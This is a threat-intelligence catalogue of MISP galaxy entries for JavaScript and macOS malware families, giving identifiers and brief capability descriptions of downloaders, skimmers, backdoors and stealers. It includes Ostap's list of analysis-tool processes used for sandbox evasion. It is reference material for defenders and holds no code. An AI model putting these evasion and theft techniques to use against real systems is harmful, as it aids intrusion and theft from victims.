Internal MISP references

UUID b7deec7e-24f7-4f78-9d58-9b3c1e182ab3 which can be used as unique global reference for EVILNUM (Javascript) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FakeUpdateRU

FakeUpdateRU is a malicious JavaScript code injected into compromised websites to deliver further malware using the drive-by download technique. The malicious code displays a copy of the Google Chrome web browser download page and redirects the user to the download of a next-stage payload.

Internal MISP references

UUID 9106e280-febe-45a3-9cd1-cbffafc0c85b which can be used as unique global reference for FakeUpdateRU in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FAKEUPDATES

FAKEUPDATES is a downloader written in JavaScript that communicates via HTTP. Supported payload types include executables and JavaScript. It writes the payloads to disk prior to launching them. FAKEUPDATES has led to further compromise via additional malware families that include CHTHONIC, DRIDEX, EMPIRE, KOADIC, DOPPELPAYMER, and AZORULT.

FAKEUPDATES has been heavily used by UNC1543, a financially motivated group.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FAKEUPDATES.

Known Synonyms
`FakeUpdate`
`SocGholish`

Internal MISP references

UUID cff35ce3-8d6f-417b-ae6c-a9e6a60ee26c which can be used as unique global reference for FAKEUPDATES in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GootLoader

According to PCrisk, they discovered GootLoader malware while examining legitimate but compromised websites (mainly websites managed using WordPress). It was found that GootLoader is used to infect computers with additional malware. Cybercriminals using GootLoader seek to trick users into unknowingly downloading and executing the malware by disguising it as a document or other file.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GootLoader.

Known Synonyms
`SLOWPOUR`

Internal MISP references

UUID 5b2569e5-aeb2-4708-889f-c6d598bd5e14 which can be used as unique global reference for GootLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

grelos

grelos is a skimmer used for magecart-style attacks.

Internal MISP references

UUID 79580c0b-c390-4421-976a-629a5c11af95 which can be used as unique global reference for grelos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Griffon

GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Griffon.

Known Synonyms
`Harpy`

Internal MISP references

UUID 85c25380-69d7-4d7e-b279-6b6791fd40bd which can be used as unique global reference for Griffon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

inter

Internal MISP references

UUID 36b0f1a0-29a4-4ec5-bca2-18a241881d49 which can be used as unique global reference for inter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Jeniva

Internal MISP references

UUID b0631a44-3264-429d-b8bc-3a27e27be305 which can be used as unique global reference for Jeniva in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Jetriz

Internal MISP references

UUID 9e6a0a54-8b55-4e78-a3aa-15d1946882e1 which can be used as unique global reference for Jetriz in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

jspRAT

Internal MISP references

UUID 71903afc-7129-4821-90e5-c490e4902de3 which can be used as unique global reference for jspRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KopiLuwak

Internal MISP references

UUID 2269d37b-87e9-460d-b878-b74a2f4c3537 which can be used as unique global reference for KopiLuwak in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LNKR

The LNKR trojan is a malicious browser extension that will monitor the websites visited by the user, looking for pages with administrative privileges such as blog sites or web-based virtual learning environments. When the administrative user posts to the page, the infected extension will execute stored cross-site scripting attack and injects malicious JavaScript into the legitimate HTML of the page. This is used to redirect the second-party visitors of the site to both benign and malicious domains.

Internal MISP references

UUID 1a85acf3-4bda-49b4-9e50-1231f0b7340a which can be used as unique global reference for LNKR in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

magecart

Magecart is a malware framework intended to steal credit card information from compromised eCommerce websites. Used in criminal activities, it's a sophisticated implant built on top of relays, command and controls and anonymizers used to steal eCommerce customers' credit card information. The first stage is typically implemented in Javascript included into a compromised checkout page. It copies data from "input fields" and send them to a relay which collects credit cards coming from a subset of compromised eCommerces and forwards them to Command and Control servers.

Internal MISP references

UUID f53e404b-0dcd-4116-91dd-cad94fc41936 which can be used as unique global reference for magecart in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

megaMedusa

MegaMedusa is NodeJS DDoS Machine Layer-7 provided by RipperSec Team.

Internal MISP references

UUID 8a51e636-13be-4bdc-a32f-2d832263ba5b which can be used as unique global reference for megaMedusa in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MiniJS

MiniJS is a very simple JavaScript-based first-stage backdoor. The backdoor is probably distributed via spearphishing email. Due to infrastructure overlap, the malware can be attributed to the actor Turla. Comparable JavaScript-based backdoor families of the actor are KopiLuwak and IcedCoffee.

Internal MISP references

UUID 5fd2f4f0-0591-45bb-a843-c194d5e294cd which can be used as unique global reference for MiniJS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MintsLoader

According to Orange Cyberdefense, MintsLoader is a little-known, multi-stage malware loader that has been used since at least February 2023. It has been observed in widespread distribution campaigns between July and October 2024. The name comes from a very characteristic use of an URL parameter “1.php?s=mintsXX" (with XX being numbers).

MintsLoader primarily delivers malicious RAT or infostealing payloads such as AsyncRAT and Vidar through phishing emails, targeting organizations in Europe (Spain, Italy, Poland, etc.). Written in JavaScript and PowerShell, MintsLoader operates through a multi-step infection process involving several URLs and domains, most of which use a domain generation algorithm (DGA) with .top TLD.

Internal MISP references

UUID 0cd219f4-1f3b-4958-b678-173257abd67e which can be used as unique global reference for MintsLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

More_eggs

More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are: - d&exec = download and execute PE file - gtfo = delete files/startup entries and terminate - more_eggs = download additional/new scripts - more_onion = run new script and terminate current script - more_power = run command shell commands

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular More_eggs.

Known Synonyms
`SKID`
`SpicyOmelette`

Internal MISP references

UUID 1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f which can be used as unique global reference for More_eggs in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NanHaiShu

NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute.

Internal MISP references

UUID 3e46af39-52e8-442f-aff1-38eeb90336fc which can be used as unique global reference for NanHaiShu in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NodeRAT

Internal MISP references

UUID e3b0ed5c-4e6a-4f50-bef2-1f7112aa31ed which can be used as unique global reference for NodeRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OFFODE

According to the author, this is a project that will give understanding of bypassing Multi Factor Authentication (MFA) of an outlook account. It is build in node.js and uses playwright for the automation in the backend.

Internal MISP references

UUID 0be6d248-382a-48b8-9a52-dba08aaa891e which can be used as unique global reference for OFFODE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ostap

Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:

AgentSimulator.exe anti-virus.EXE BehaviorDumper BennyDB.exe ctfmon.exe fakepos_bin FrzState2k gemu-ga.exe (Possible misspelling of Qemu hypervisor’s guest agent, qemu-ga.exe) ImmunityDebugger.exe KMS Server Service.exe ProcessHacker procexp Proxifier.exe python tcpdump VBoxService VBoxTray.exe VmRemoteGuest vmtoolsd VMware2B.exe VzService.exe winace Wireshark

If a blacklisted process is found, the malware terminates.

Ostap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.

Internal MISP references

UUID a3b93781-c51c-4ccb-a856-804331470a9d which can be used as unique global reference for ostap in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ParaSiteSnatcher

Internal MISP references

UUID 9af9557c-04fc-4231-85c4-d1fb30c53cb6 which can be used as unique global reference for ParaSiteSnatcher in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Parrot TDS

This malicious code written in JavaScript is used as Traffic Direction System (TDS). This TDS showes similarities to the Prometheus TDS. According to DECODED Avast.io this TDS has been active since October 2021.

Internal MISP references

UUID dbefad0a-29d3-49d3-b925-116598182dee which can be used as unique global reference for Parrot TDS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PeaceNotWar

PeaceNotWar was integrated into the nodejs module node-ipc as a piece of malware/protestware with wiper characteristics. It targets machines with a public IP address located in Russia and Belarus (using geolocation) and overwrites files recursively using a heart emoji.

Internal MISP references

UUID 6c304481-024e-4f34-af06-6235edacfdcc which can be used as unique global reference for PeaceNotWar in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PindOS

Internal MISP references

UUID 6af1eb7a-bc54-43af-9e15-7187a5f250c4 which can be used as unique global reference for PindOS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Powmet

Internal MISP references

UUID 9521ceb0-039d-412c-a38b-7bd9ddfc772e which can be used as unique global reference for Powmet in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

QNodeService

According to Trend Micro, this is a Node.js based malware, that can download/upload/execute files, steal credentials from Chrome/Firefox browsers, and perform file management, among other things. It targets Windows and has components for both 32 and 64bit.

Internal MISP references

UUID 52d9260f-f090-4e79-b0b3-0c89f5db6bc6 which can be used as unique global reference for QNodeService in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

QUICKCAFE

QUICKCAFE is an encrypted JavaScript downloader for QUICKRIDE.POWER that exploits the ActiveX M2Soft vulnerabilities. QUICKCAFE is obfuscated using JavaScript Obfuscator.

Internal MISP references

UUID 475766d2-1e99-4d81-89e4-0d0df4a562d0 which can be used as unique global reference for QUICKCAFE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

scanbox

Internal MISP references

UUID 0a13a546-91a2-4de0-9bbb-71c9233ce6fa which can be used as unique global reference for scanbox in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SQLRat

SQLRat campaigns typically involve a lure document that includes an image overlayed by a VB Form trigger. Once a user has double-clicked the embedded image, the form executes a VB setup script. The script writes files to the path %appdata%\Roaming\Microsoft\Templates\, then creates two task entries triggered to run daily. The scripts are responsible for deobfuscating and executing the main JavaScript file mspromo.dot. The file uses a character insertion obfuscation technique, making it appear to contain Chinese characters. After deobfuscating the file, the main JavaScript is easily recognizable. It contains a number of functions designed to drop files and execute scripts on a host system. The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables.

Internal MISP references

UUID d51cb8f8-cca3-46ce-a05d-052df44aef40 which can be used as unique global reference for SQLRat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Starfighter (Javascript)

According to the author, this is a JavaScript based Empire launcher that runs with its own embedded powershell host to not be dependent on local powershell availability.

Internal MISP references

UUID f6c80748-1cce-4f6b-92e9-f8a04ff3464a which can be used as unique global reference for Starfighter (Javascript) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Swid

Internal MISP references

UUID d4be22cf-497d-46a0-8d57-30d10d9486e3 which can be used as unique global reference for Swid in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HTML5 Encoding

Internal MISP references

UUID c7ab9e5a-0ec9-481e-95ec-ad08f06cf985 which can be used as unique global reference for HTML5 Encoding in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Maintools.js

Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'.

Internal MISP references

UUID 218f8ca8-1124-4e44-8fbd-4b05b46bde4b which can be used as unique global reference for Maintools.js in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified JS 001 (APT32 Profiler)

Internal MISP references

UUID f2b0ffdc-7d4e-4786-8935-e7036faa174d which can be used as unique global reference for Unidentified JS 001 (APT32 Profiler) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified JS 003 (Emotet Downloader)

According to Max Kersten, Emotet is dropped by a procedure spanned over multiple stages. The first stage is an office file that contains a macro. This macro then loads the second stage, which is either a PowerShell script or a piece of JavaScript, which is this family entry.

Internal MISP references

UUID 7bf28be0-3153-474d-8df7-e12fec511d7e which can be used as unique global reference for Unidentified JS 003 (Emotet Downloader) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified JS 004

A simple loader written in JavaScript found by Marco Ramilli.

Internal MISP references

UUID a15e7c49-4eb6-46f0-8f79-0b765d7d4e46 which can be used as unique global reference for Unidentified JS 004 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified JS 005 (Stealer)

Internal MISP references

UUID a797e9b9-cb3f-484a-9273-ac73e9ea1e06 which can be used as unique global reference for Unidentified JS 005 (Stealer) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified JS 006 (Winter Wyvern)

A script able to list folders and emails in the current Roundcube account, and to exfiltrate email messages to the C&C server by making HTTP requests.

Internal MISP references

UUID 547fed09-38d0-4813-b9b0-870a1d4136df which can be used as unique global reference for Unidentified JS 006 (Winter Wyvern) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified JS 002

Internal MISP references

UUID 7144063f-966b-4277-b316-00eb970ccd52 which can be used as unique global reference for Unidentified JS 002 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_js_002 - webarchive

Associated metadata

Metadata key	Value
type	[]

Valak

According to PCrisk, Valak is malicious software that downloads JScript files and executes them. What happens next depends on the actions performed by the executed JScript files. It is very likely that cyber criminals behind Valak attempt to use this malware to cause chain infections (i.e., using Valak to distribute other malware).

Research shows that Valak is distributed through spam campaigns, however, in some cases, it infiltrates systems when they are already infected with malicious program such as Ursnif (also known as Gozi).

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Valak.

Known Synonyms
`Valek`

Internal MISP references

UUID b37b4d91-0ac7-48f5-8fd1-5237b9615cf7 which can be used as unique global reference for Valak in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

witchcoven

Internal MISP references

UUID dcc0fad2-29a9-4b69-9d75-d288ca458bc7 which can be used as unique global reference for witchcoven in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Godzilla Webshell

Internal MISP references

UUID 07e88ccf-6027-412b-99bf-0fa1d3cfb174 which can be used as unique global reference for Godzilla Webshell in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

3CX Backdoor (OS X)

Internal MISP references

UUID d5e10bf9-9de8-46be-96d0-aa502b14ffe8 which can be used as unique global reference for 3CX Backdoor (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AMOS

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AMOS.

Known Synonyms
`Atomic macOS Stealer`

Internal MISP references

UUID 2fa2be52-e44f-4998-bde7-c66cfb6f4521 which can be used as unique global reference for AMOS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AppleJeus (OS X)

According to PcRisk AppleJeus is the name of backdoor malware that was distributed by the Lazarus group. They spread this malicious software through a fake app disguised as a cryptocurrency trading application called Celas Trade Pro.

Internal MISP references

UUID ca466f15-8e0a-4030-82cb-5382e3c56ee5 which can be used as unique global reference for AppleJeus (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BANSHEE

Internal MISP references

UUID 5d7b9bcf-a0b6-47eb-8350-a80fac356567 which can be used as unique global reference for BANSHEE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bella

Internal MISP references

UUID 3c5036ad-2afc-4bc1-a5a3-b31797f46248 which can be used as unique global reference for Bella in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bundlore

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bundlore.

Known Synonyms
`SurfBuyer`

Internal MISP references

UUID 5f5f5496-d9f8-4984-aa66-8702741646fe which can be used as unique global reference for Bundlore in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Careto

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Careto.

Known Synonyms
`Appetite`
`Mask`

Internal MISP references

UUID dcabea75-a433-4157-bb7a-be76de3026ac which can be used as unique global reference for Careto in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Casso

Internal MISP references

UUID 387e1a19-458d-4961-a8e4-3f82463085e5 which can be used as unique global reference for Casso in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CDDS

Google TAG has observed this malware being delivered via watering hole attacks using 0-day exploits, targeting visitors to Hong Kong websites for a media outlet and a prominent pro-democracy labor and political group.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CDDS.

Known Synonyms
`Macma`

Internal MISP references

UUID 5e4bdac7-b6c8-4c59-996f-babfc3bb3a3c which can be used as unique global reference for CDDS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Choziosi (OS X)

A loader delivering malicious Chrome and Safari extensions.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Choziosi (OS X).

Known Synonyms
`ChromeLoader`
`Chropex`

Internal MISP references

UUID 57f75f24-b77b-46b3-a06a-57d49374fb82 which can be used as unique global reference for Choziosi (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CloudMensis

Internal MISP references

UUID 557fc183-f51a-4740-b2dd-5e81e6f6690a which can be used as unique global reference for CloudMensis in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CoinThief

CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component.

It was spreading in early 2014 from several different sources: - on Github (where the trojanized compiled binary didn’t match the displayed source code), o - on popular and trusted download sites line CNET's Download.com or MacUpdate.com, and - as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.

The patcher‘s role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt adding malicious code that would send nearly all the victim’s Bitcoins to one of the hard-coded addresses belonging to the attacker.

The browser extensions targeted Chrome and Firefox and are disguised as a “Pop-up blocker”. The extensions monitored visited websites, download malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker’s address or simply harvest login credentials to the targeted online service.

The backdoor enabled the attacker to take full control over the victim’s computer: - collect information about the infected computer - execute arbitrary shell scripts on the target computer - upload an arbitrary file from the victim’s hard drive to a remote server - update itself to a newer version

Internal MISP references

UUID 70e73da7-21d3-4bd6-9a0e-0c904e6457e8 which can be used as unique global reference for CoinThief in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Coldroot RAT

Internal MISP references

UUID 076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf which can be used as unique global reference for Coldroot RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Convuster

Internal MISP references

UUID 3819ded3-27ac-4e2f-9cd6-c6ef1642599b which can be used as unique global reference for Convuster in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CpuMeaner

Internal MISP references

UUID 74360d1e-8f85-44d1-8ce7-e76afb652142 which can be used as unique global reference for CpuMeaner in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CreativeUpdater

Internal MISP references

UUID 40fc6f71-75ac-43ac-abd9-c90b0e847999 which can be used as unique global reference for CreativeUpdater in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Crisis

Internal MISP references

UUID 2bb6c494-8057-4d83-9202-fda3284deee4 which can be used as unique global reference for Crisis in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Crossrider

Internal MISP references

UUID 05ddb459-5a2f-44d5-a135-ed3f1e772302 which can be used as unique global reference for Crossrider in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cthulhu Stealer

Internal MISP references

UUID 549f4c7c-55e3-478e-a84e-e27c5e195c97 which can be used as unique global reference for Cthulhu Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dacls (OS X)

According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.

Research shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.

Internal MISP references

UUID 81def650-f52e-49a3-a3fe-cb53ffa75d67 which can be used as unique global reference for Dacls (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarthMiner

Internal MISP references

UUID a8e71805-014d-4998-b21e-3125da800124 which can be used as unique global reference for DarthMiner in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DazzleSpy

Internal MISP references

UUID ba2c7d3c-7f7a-42f7-854c-a6cc0b5eb850 which can be used as unique global reference for DazzleSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dockster

Internal MISP references

UUID 713d8ec4-4983-4fbb-827c-2ef5bc0e6930 which can be used as unique global reference for Dockster in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dummy

Internal MISP references

UUID cbf9ff89-d35b-4954-8873-32f59f5e4d7d which can be used as unique global reference for Dummy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Eleanor

Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.

The Tor service transforms the victim’s computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address.

The Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.

The web service is the main malicious component that provides the attackers with the control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:

Managing files
Listing processes
Connecting to various database management systems such as MySQL or SQLite
Connecting via bind/reverse shell
Executing shell command
Capturing and browsing images and videos from the victim’s webcam
Sending emails with an attachment

Internal MISP references

UUID c221e519-fe3e-416e-bc63-a2246b860958 which can be used as unique global reference for Eleanor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ElectroRAT

According to PCrisk, ElectroRAT is a Remote Access Trojan (RAT) written in the Go programming language and designed to target Windows, MacOS, and Linux users. Cyber criminals behind ElectroRAT target mainly cryptocurrency users. This RAT is distributed via the trojanized Jamm, eTrader, and DaoPoker applications.

Internal MISP references

UUID f8ccf928-7d4f-4999-91a5-9222f148152d which can be used as unique global reference for ElectroRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EvilOSX

Internal MISP references

UUID 24f3d8e1-3936-4664-b813-74c797b87d9d which can be used as unique global reference for EvilOSX in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EvilQuest

According to PcRisk, EvilQuest (also known as ThiefQuest) is like many other malicious programs of this type - it encrypts files and creates a ransom message. In most cases, this type of malware modifies the names of encrypted files by appending certain extensions, however, this ransomware leaves them unchanged.

It drops the "READ_ME_NOW.txt" in each folder that contains encrypted data and displays another ransom message in a pop-up window. Additionally, this malware is capable of detecting if certain files are stored on the computer, operates as a keylogger, and receives commands from a Command & Control server.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EvilQuest.

Known Synonyms
`ThiefQuest`

Internal MISP references

UUID d5b39223-a8cc-4d47-8030-1d7d6312d351 which can be used as unique global reference for EvilQuest in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FailyTale

Internal MISP references

UUID 5dfd704c-a69d-4e93-bd70-68f89fbbb32c which can be used as unique global reference for FailyTale in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FinFisher (OS X)

Internal MISP references

UUID 89ce536c-03b9-4f69-83ce-723f26b36494 which can be used as unique global reference for FinFisher (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FlashBack

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FlashBack.

Known Synonyms
`FakeFlash`

Internal MISP references

UUID f92b5355-f398-4f09-8bcc-e06df6fe51a0 which can be used as unique global reference for FlashBack in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FruitFly

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FruitFly.

Known Synonyms
`Quimitchin`

Internal MISP references

UUID a517cdd1-6c82-4b29-bdd2-87e281227597 which can be used as unique global reference for FruitFly in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FULLHOUSE

Fullhouse (AKA FULLHOUSE.DOORED) is a custom backdoor used by subsets of the North Korean Lazarus Group. Fullhouse is written in C/C++ and includes the capabilities of a tunneler and backdoor commands support such as shell command execution, file transfer, file managment, and process injection. C2 communications occur via HTTP and require configuration through the command line or a configuration file.

Internal MISP references

UUID 2ab781d8-214d-41e2-acc9-23ded4f77663 which can be used as unique global reference for FULLHOUSE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GIMMICK (OS X)

This multi-platform malware is a ObjectiveC written macOS variant dubbed GIMMICK by Volexity. This malware is a file-based C2 implant used by Storm Cloud.

Internal MISP references

UUID 0e259d0f-717a-4ced-ac58-6fe9d72e2c96 which can be used as unique global reference for GIMMICK (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gmera

According to PCrisk, GMERA (also known as Kassi trojan) is malicious software that disguises itself as Stockfolio, a legitimate trading app created for Mac users.

Research shows that there are two variants of this malware, one detected as Trojan.MacOS.GMERA.A and the other as Trojan.MacOS.GMERA.B. Cyber criminals proliferate GMERA to steal various information and upload it to a website under their control. To avoid damage caused by this malware, remove GMERA immediately.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gmera.

Known Synonyms
`Kassi`
`StockSteal`

Internal MISP references

UUID 1c65cf4e-5df4-4d56-a414-7b05f00814ba which can be used as unique global reference for Gmera in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HiddenLotus

According to Malwarebytes, The HiddenLotus "dropper" is an application named Lê Thu Hà (HAEDC).pdf, using an old trick of disguising itself as a document - in this case, an Adobe Acrobat file.

Internal MISP references

UUID fc17e41f-e9f7-4442-a05c-7a19b9174c39 which can be used as unique global reference for HiddenLotus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HLOADER

Internal MISP references

UUID 28304d68-689e-4488-80cb-d5b7b50a8d57 which can be used as unique global reference for HLOADER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HZ RAT (OS X)

Internal MISP references

UUID 37f37678-c8c3-44d7-82bd-ecb452fba012 which can be used as unique global reference for HZ RAT (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

iMuler

The threat was a multi-stage malware displaying a decoy that appeared to the victim as a Chinese language article on the long-running dispute over the Diaoyu Islands; an array of erotic pictures; or images of Tibetan organisations. It consisted of two stages: Revir was the dropper/downloader and Imuler was the backdoor capable of the following operations:

capture screenshots
exfiltrate files to a remote computer
send various information about the infected computer
extract ZIP archive
download files from a remote computer and/or the Internet
run executable files

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular iMuler.

Known Synonyms
`Revir`

Internal MISP references

UUID 261fd543-60e4-470f-af28-7a9b17ba4759 which can be used as unique global reference for iMuler in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Interception (OS X)

Internal MISP references

UUID d4f7ea92-04e7-405c-9faf-7993ffd5c473 which can be used as unique global reference for Interception (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Janicab (OS X)

